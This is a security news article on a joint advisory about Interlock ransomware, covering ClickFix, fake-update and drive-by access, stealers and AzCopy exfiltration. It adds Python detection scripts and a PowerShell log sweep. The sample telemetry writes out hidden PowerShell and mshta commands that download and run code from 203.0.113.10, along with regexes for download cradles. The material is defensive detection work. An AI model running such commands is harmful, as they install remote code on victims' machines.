LIVE NEWSROOM · May 15, 2026

CISA and FBI Warn of Interlock Ransomware Using ClickFix to Hit Critical Infrastructure


The FBI, CISA, the Department of Health and Human Services, and the Multi-State Information Sharing and Analysis Center released joint advisory AA25-203A (published July 22, 2025) detailing Interlock ransomware tactics, techniques, and procedures observed through mid-2025. Interlock has targeted critical infrastructure, healthcare, technology, government, and manufacturing organizations in North America and Europe since its emergence in late September 2024. The group's tradecraft combines three distinct initial access methods, including the increasingly common ClickFix social engineering technique, with credential-harvesting infostealers and a double-extortion model in which data is exfiltrated first and systems are encrypted afterward.

// 01 Interlock Ransomware: Technical Details

Interlock is a cross-platform ransomware strain with variants targeting both Windows and Linux environments. Encrypted files receive either a .interlock or .1nt3rlock extension depending on the variant. The ransom note, named !__README__!.txt, is delivered via Group Policy for maximum coverage across domain-joined systems.

Initial Access

FBI investigations through June 2025 identify three primary initial access vectors:

  • Drive-by downloads from compromised legitimate websites: Interlock actors compromise reputable third-party sites to serve malicious downloads, which lets them target visitors by geography or industry without standing up phishing infrastructure of their own.
  • Fake browser update lures: malicious payloads disguised as Google Chrome or Microsoft Edge updates are distributed via compromised pages. Earlier campaigns used browser-update filenames; more recent activity has shifted toward impersonating security software updates (the advisory names FortiClient, Ivanti Secure Access Client, and GlobalProtect).
  • ClickFix social engineering: victims encounter a fake error or CAPTCHA dialog on a compromised or attacker-controlled webpage. The page's own script places a PowerShell command on the clipboard, and the dialog instructs the user to open the Windows Run dialog (Win+R), paste (Ctrl+V), and press Enter to "fix" the displayed issue. Executing the pasted command installs the Interlock dropper. ClickFix is effective because the browser never downloads a file: execution is a user-initiated action, so download warnings and endpoint policies keyed on file downloads never fire. What it does leave behind is a script host (powershell.exe, mshta.exe) spawned by explorer.exe and the pasted command in the user's RunMRU registry key, which is where detection and forensics should look.
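
The process chain a ClickFix paste leaves behind is what a detection should key on. The following is an added example written for this article, not code from the advisory or from any Interlock sample: it scores constructed Sysmon Event ID 1 / Security 4688 style records for a script host launched by explorer.exe with download-cradle, in-memory execution, hidden-window or encoded-command traits, and applies the same scoring to exported RunMRU values. The field names, host names, user names and the 203.0.113.10 URL are assumptions for the example.

```python
"""Flag ClickFix-style executions in process-creation telemetry.

Added example (not from advisory AA25-203A or the article). The records below are
constructed to resemble Sysmon Event ID 1 / Security 4688 fields; the field names
and the host, user and URL values are assumptions for the example.
"""
import re

# Script hosts a pasted Run-dialog command usually lands in.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# A parent of explorer.exe means the user launched it (Run dialog, Start menu,
# address bar) rather than a scheduler, management agent or another script.
USER_LAUNCHED_PARENTS = {"explorer.exe"}

# Command-line traits of a ClickFix paste. Each hit scores one point.
INDICATORS = [
    ("download_cradle", re.compile(
        r"\b(invoke-webrequest|iwr|curl|wget|downloadstring|net\.webclient|bitsadmin|certutil)\b", re.I)),
    ("inmemory_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("encoded_command", re.compile(r"\s-(e|ec|en|enc|encodedcommand)\s", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("policy_bypass", re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
]
USER_LAUNCHED_WEIGHT = 2   # a user-typed script host is the core of the pattern


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, hit names) for one process-creation record."""
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return 0, []
    hits = [name for name, rx in INDICATORS if rx.search(ev["command_line"])]
    score = len(hits)
    if basename(ev["parent_image"]) in USER_LAUNCHED_PARENTS:
        hits.append("user_launched_parent")
        score += USER_LAUNCHED_WEIGHT
    return score, hits


def find_clickfix(events, threshold=3):
    """Events scoring at least `threshold`. A bare user-opened PowerShell scores 2 and
    an agent-run script with -ExecutionPolicy Bypass scores 1; neither is reported."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append({"host": ev["host"], "user": ev["user"], "score": score,
                             "hits": hits, "command_line": ev["command_line"]})
    return findings


def runmru_to_event(host, user, raw_value):
    """Turn one RunMRU value (Win+R history under HKCU\\...\\Explorer\\RunMRU; each
    value ends in '\\1') into a record so the same scoring applies to Run history."""
    cmd = raw_value[:-2] if raw_value.endswith("\\1") else raw_value
    first = (cmd.split() or [""])[0].strip('"')
    image = first if first.lower().endswith(".exe") else first + ".exe"
    return {"host": host, "user": user, "parent_image": "explorer.exe",
            "image": image, "command_line": cmd}


# Constructed telemetry: one ClickFix paste, one mshta variant, three benign launches.
SAMPLE_EVENTS = [
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"iex (iwr 'http://203.0.113.10/fix.txt').Content\""},
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://203.0.113.10/verify.hta"},
    {"host": "SRV-APP01", "user": "NT AUTHORITY\\SYSTEM",        # SCCM-run script
     "parent_image": r"C:\Windows\CCM\CcmExec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Windows\CCM\scripts\inventory.ps1"},
    {"host": "WS-0142", "user": "CORP\\jdoe",                    # user opens a console
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]

SAMPLE_RUNMRU = [  # constructed RunMRU values exported for CORP\jdoe on WS-0142
    'powershell -w hidden -c "iex (iwr http://203.0.113.10/fix.txt)"\\1',
    "notepad\\1",
    "\\\\fileserver\\share\\1",
]

if __name__ == "__main__":
    for f in find_clickfix(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']} score={f['score']} hits={f['hits']}")
    mru = [runmru_to_event("WS-0142", "CORP\\jdoe", v) for v in SAMPLE_RUNMRU]
    for f in find_clickfix(mru):
        print("RunMRU:", f["command_line"])
```

Run as a script it prints the PowerShell paste, the mshta variant and the matching RunMRU entry; real 4688 or Sysmon records in the same shape drop straight in. The weighting is deliberate: a user merely opening PowerShell (score 2) and a management agent running a script with -ExecutionPolicy Bypass (score 1) stay below the threshold, which is the difference between a rule analysts keep and one they mute.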

Post-Compromise Activity

Once inside a network, Interlock operators deploy several tools for lateral movement and data staging:

  • Lumma Stealer and Berserk Stealer to harvest credentials for lateral movement and privilege escalation
  • AnyDesk for persistent remote connectivity to compromised hosts
  • PuTTY for SSH-based lateral movement within compromised networks
  • Azure Storage Explorer (StorageExplorer.exe) and AzCopy to navigate and exfiltrate data to attacker-controlled Azure Blob Storage accounts

Exfiltration precedes encryption. Interlock actors stage stolen data in Azure before deploying the encryptor, establishing leverage for the double-extortion demand: pay to decrypt, or the stolen data gets published on the Interlock data-leak site.

// 02 Exploitation Status and Threat Landscape

Interlock has been actively operating since September 2024 with confirmed impact across critical infrastructure, healthcare, technology, government, and manufacturing sectors, predominantly in North America and Europe. The advisory draws on FBI investigation data through June 2025 and corroborating private threat intelligence.

The ClickFix vector is notable because it defeats several common defensive layers simultaneously. Users who see a familiar-looking “Fix this issue” error message on a website they trust are more likely to follow the instructions than to scrutinize a suspicious file download. DNS filtering and web proxies that block known malicious domains provide partial mitigation, but Interlock’s use of compromised legitimate sites means the hosting domain itself may be trusted.

The combination of infostealers, credential-based lateral movement, and Azure-native exfiltration tools makes Interlock particularly difficult to detect before encryption begins: the tooling overlaps significantly with legitimate IT administration activity.

// 03 Who Is Affected

Interlock targets do not appear to be constrained by organization size. The advisory's victim profile includes smaller healthcare providers and municipal government entities alongside larger enterprises. The common denominator is sector membership in critical infrastructure, healthcare, technology, or government: organizations likely to pay ransoms under operational pressure and likely to hold data worth publishing.

// 04 What You Should Do Right Now

  • Block ClickFix delivery. Deploy DNS filtering on known ClickFix and fake-update domains. Implement web gateway policies that flag pages containing instructions to open a Run dialog or paste PowerShell commands. On endpoints, remove the Run dialog for standard users where the business allows it (the Explorer NoRun policy also disables Win+R), restrict powershell.exe and mshta.exe for non-administrators with AppLocker or WDAC, and make sure process creation auditing (Event ID 4688 with command line) and PowerShell script block logging (Event ID 4104) are on, so a paste that does get through is recorded. User awareness training on ClickFix lures complements these controls rather than replacing them.
  • Restrict and monitor RDP access. Interlock actors move laterally via RDP using stolen credentials. If RDP must be exposed, limit it to VPN-authenticated sessions, require MFA, and alert on RDP logons (Security Event ID 4624 with logon type 10) from unusual source IPs or during off-hours, and on workstation-to-workstation RDP, which rarely has a legitimate reason.
  • Detect AzCopy-based exfiltration. Monitor for AzCopy.exe or StorageExplorer.exe initiating outbound connections to *.blob.core.windows.net from servers that do not routinely use Azure services. Process-creation events give the first signal; network telemetry (Sysmon Event ID 3 or proxy logs) confirms the destination. A quick sweep of the Security log for either binary:

```powershell
# Needs Audit Process Creation (Security Event ID 4688) enabled, plus the
# "Include command line in process creation events" policy; without the latter
# the Message field carries no command line and only the image name can match.
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4688]]" |
    Where-Object { $_.Message -match 'AzCopy|StorageExplorer' } |
    Select-Object TimeCreated, MachineName, Message
```

  • Hunt for infostealer infections proactively. Lumma Stealer and Berserk Stealer are deployed before the ransomware stage, often well before it. Indicators of compromise for both are included in advisory AA25-203A. Scan endpoints and remove infections before harvested credentials enable lateral movement, and treat any confirmed infostealer hit as a credential-reset event for every account that has logged on to that host.
  • Alert on the .interlock and .1nt3rlock file extensions and the !__README__!.txt ransom note in file integrity monitoring and EDR policies, and where the product supports it block the process writing them. A burst of renames on a file server is the earliest sign that encryption has started, and catching it then can limit the blast radius significantly before full network encryption completes.
  • Test your incident response plan. CISA’s advisory explicitly notes that organizations without exercised IR plans face worse outcomes. Run a tabletop scenario simulating Interlock’s attack chain — initial website compromise, infostealer infection, lateral movement, and encryption — against your current detection stack.
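
The AzCopy bullet and the encryption-extension bullet above describe two hunts that are easy to state and easy to get wrong (every browser talks to Blob storage; one stray renamed file is not an encryptor). The following is an added example written for this article, not code from the advisory: it runs both hunts over constructed Sysmon Event ID 3 (network connection) and Event ID 11 (file create) style records, with a host baseline for legitimate Azure Storage use and a sliding-window burst rule for ransom extensions. Host names, the storage-account name, the AZURE_BASELINE set and the field names are assumptions for the example.

```python
"""Hunt for AzCopy/Storage Explorer exfiltration and for the start of encryption.

Added example (not from advisory AA25-203A or the article). The records are
constructed to resemble Sysmon Event ID 3 (network connection) and Event ID 11
(file create); field names, host names, the storage-account name and the
AZURE_BASELINE list are assumptions for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Hosts whose role legitimately involves Azure Storage (here a backup server).
# Anything else driving AzCopy or Storage Explorer at Blob storage gets a ticket.
AZURE_BASELINE = {"bkp-01"}

EXFIL_TOOLS = {"azcopy.exe", "storageexplorer.exe"}
RANSOM_EXTENSIONS = (".interlock", ".1nt3rlock")
RANSOM_NOTE = "!__readme__!.txt"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def find_exfil(net_events):
    """Exfil tool + Blob endpoint + non-baselined host. Matching on the image name
    misses a renamed azcopy.exe, so the destination check is the half that matters;
    add proxy logs if a host's network events are not collected."""
    findings = []
    for ev in net_events:
        tool = basename(ev["image"]) in EXFIL_TOOLS
        blob = ev["dest_host"].lower().endswith(".blob.core.windows.net")
        if tool and blob and ev["host"].lower() not in AZURE_BASELINE:
            findings.append({"host": ev["host"], "image": basename(ev["image"]),
                             "dest": ev["dest_host"], "time": ev["time"]})
    return findings


def find_encryption(file_events, window=timedelta(seconds=60), threshold=25):
    """Return (bursts, notes). A burst is `threshold` ransom-extension creates on one
    host inside `window`, reported the moment the threshold is crossed so the alert
    fires early; notes are every !__README__!.txt seen, which needs no threshold."""
    per_host = defaultdict(list)
    notes = []
    for ev in file_events:
        name = basename(ev["path"])
        if name == RANSOM_NOTE:
            notes.append({"host": ev["host"], "path": ev["path"], "time": ev["time"]})
        elif name.endswith(RANSOM_EXTENSIONS):
            per_host[ev["host"]].append(ev["time"])
    bursts = []
    for host, times in per_host.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                bursts.append({"host": host, "count": end - start + 1,
                               "first": times[start], "crossed_at": times[end]})
                break
    return bursts, notes


T0 = datetime(2025, 6, 14, 2, 17, 0)   # constructed timeline

NET_EVENTS = [
    {"host": "FS-02", "time": T0 - timedelta(hours=3),
     "image": r"C:\Users\svc_backup\AppData\Local\Temp\azcopy.exe",
     "dest_host": "exfildata001.blob.core.windows.net", "dest_port": 443},
    {"host": "FS-02", "time": T0 - timedelta(hours=2),
     "image": r"C:\Program Files\Microsoft Azure Storage Explorer\StorageExplorer.exe",
     "dest_host": "exfildata001.blob.core.windows.net", "dest_port": 443},
    {"host": "BKP-01", "time": T0 - timedelta(hours=2),     # baselined backup server
     "image": r"C:\Program Files\azcopy\azcopy.exe",
     "dest_host": "corpbackup.blob.core.windows.net", "dest_port": 443},
    {"host": "WS-0142", "time": T0 - timedelta(hours=1),    # browser fetching from a CDN on Blob
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "vendorcdn.blob.core.windows.net", "dest_port": 443},
]

# 60 encrypted files in 15 seconds on the file server, then the note; three stray
# matches hours apart on a workstation that must not trip the burst rule.
FILE_EVENTS = [{"host": "FS-02", "time": T0 + timedelta(milliseconds=250 * i),
                "path": rf"D:\Shares\Finance\doc{i:03d}.xlsx.interlock"} for i in range(60)]
FILE_EVENTS.append({"host": "FS-02", "time": T0 + timedelta(seconds=16),
                    "path": r"D:\Shares\Finance\!__README__!.txt"})
FILE_EVENTS += [{"host": "WS-0142", "time": T0 + timedelta(hours=h),
                 "path": rf"C:\Users\jdoe\Desktop\notes{h}.txt.1nt3rlock"} for h in range(3)]

if __name__ == "__main__":
    for f in find_exfil(NET_EVENTS):
        print(f"EXFIL   {f['host']} {f['image']} -> {f['dest']} at {f['time']:%H:%M}")
    bursts, notes = find_encryption(FILE_EVENTS)
    for b in bursts:
        print(f"ENCRYPT {b['host']} {b['count']} ransom-extension files by {b['crossed_at']:%H:%M:%S}")
    for n in notes:
        print(f"NOTE    {n['host']} {n['path']}")
```

On the constructed data the exfil hunt reports the two FS-02 connections and ignores both the baselined backup server and the browser, and the burst rule fires six seconds into the encryption run, well before the ransom note appears; the three isolated workstation files produce nothing. The baseline set is the part to maintain carefully: every host that legitimately runs AzCopy and is missing from it becomes a false positive, and every host wrongly added to it becomes a blind spot.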

// 05 Conclusion

Interlock is an operationally mature ransomware group using social engineering techniques, ClickFix in particular, that bypass standard download-based defenses. Organizations in critical infrastructure, healthcare, and government should validate that their detection stack covers the described attack chain: infostealer infection, AzCopy exfiltration, and RDP-based lateral movement all precede encryption and represent earlier, more actionable detection opportunities.

Team Ciphers Security
The Ciphers Security editorial team: practitioners covering daily threat intel, CVE deep-dives, and hands-on cybersecurity research.